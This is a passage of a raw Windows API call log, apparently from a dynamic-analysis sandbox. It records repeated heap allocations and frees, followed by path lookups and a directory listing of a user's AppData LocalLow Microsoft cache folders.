Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.935] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0198.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0198.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0198.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.935] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0198.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0198.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0198.936] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0198.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeae30 [0198.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0198.936] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0198.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeae30 | out: hHeap=0x2c0000) returned 1 [0198.937] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0198.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0198.937] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0198.937] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0198.937] PathFindFileNameW (pszPath="") returned="" [0198.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0198.937] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\cryptneturlcache\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0198.938] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.938] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Content", cAlternateFileName="")) returned 1 [0198.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0198.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x371e70 [0198.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0198.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x347090 [0198.938] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 1 [0198.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0198.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x381bd0 [0198.938] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 0 [0198.938] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0198.939] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0198.939] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0198.939] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0198.939] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0198.939] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0198.939] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0198.939] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0198.939] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0198.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.940] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0198.940] PathFindFileNameW (pszPath="") returned="" [0198.940] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\internet explorer\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0198.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8eb8 | out: hHeap=0x2c0000) returned 1 [0198.942] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, 